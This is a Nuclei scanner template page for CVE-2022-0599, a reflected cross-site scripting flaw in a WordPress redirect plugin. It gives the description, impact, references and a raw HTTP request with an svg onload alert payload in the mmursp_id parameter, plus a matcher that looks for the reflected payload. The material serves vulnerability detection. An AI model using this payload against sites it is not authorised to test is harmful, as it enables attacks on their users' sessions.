WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting
ID: CVE-2022-0599
Severity: medium
Author: scent2d
Tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan,mapping_multiple_urls_redirect_same_page_project
Description
Section titled “Description”WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.
YAML Source
Section titled “YAML Source”id: CVE-2022-0599
info: name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting author: scent2d severity: medium description: | WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ - https://nvd.nist.gov/vuln/detail/cve-2022-0599 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43227 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: mapping_multiple_urls_redirect_same_page_project product: mapping_multiple_urls_redirect_same_page framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan,mapping_multiple_urls_redirect_same_page_project
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="><svg/onload=alert(document.domain)> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' condition: and
- type: word part: body words: - 'id="mmursp_id" value="\"><svg/onload=alert(document.domain)>" />'# digest: 4b0a0048304602210090033773b3ce8288be9d3a2de244d96b42226cd721dc509651409bd86affe0bc022100c1193abc4cad83b5dda85152dcf358f8d6ef8fb7c1436753f56210873b7d932b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0599.yaml"